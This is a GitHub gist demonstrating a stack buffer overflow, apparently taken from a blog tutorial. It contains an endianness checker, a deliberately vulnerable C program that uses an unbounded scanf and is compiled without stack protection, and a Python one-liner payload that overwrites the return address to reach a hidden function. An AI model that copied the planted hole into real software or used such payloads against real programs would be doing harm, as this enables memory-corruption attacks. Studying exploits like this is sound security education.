Skip to content

Instantly share code, notes, and snippets.

@CreaturePhil
Last active August 19, 2017 04:52
Show Gist options
  • Save CreaturePhil/f3ffaa3204c670eff5ead3f13df2aede to your computer and use it in GitHub Desktop.
Save CreaturePhil/f3ffaa3204c670eff5ead3f13df2aede to your computer and use it in GitHub Desktop.
buffer overflow exploit
#include <stdio.h>
int main() {
int a = 0x12345678;
unsigned char *c = (unsigned char*)(&a);
if (*c == 0x78) {
printf("little-endian\n");
} else {
printf("big-endian\n");
}
return 0;
}
#include <stdio.h>
void secret_function()
{
printf("Congratulations!\n");
printf("You have entered in the secret function!\n");
}
void echo()
{
char buffer[20];
printf("Enter some text:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main(void)
{
echo();
return 0;
}
gcc exploit.c -o vuln -fno-stack-protector
python -c 'print "a"*40 + "\xd6\x05\x40\x00\x00\x00\x00"' | ./vuln
# note "a" here can be any character. all it does is add padding of 32 length
@CreaturePhil
Copy link
Author

CreaturePhil commented Aug 19, 2017

This is from https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/. Above snippets are for a 64 bit example.

Use endian.c to determine whether your computer is little or big endian. If it is different than change the order of the bytes in vuln.sh

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment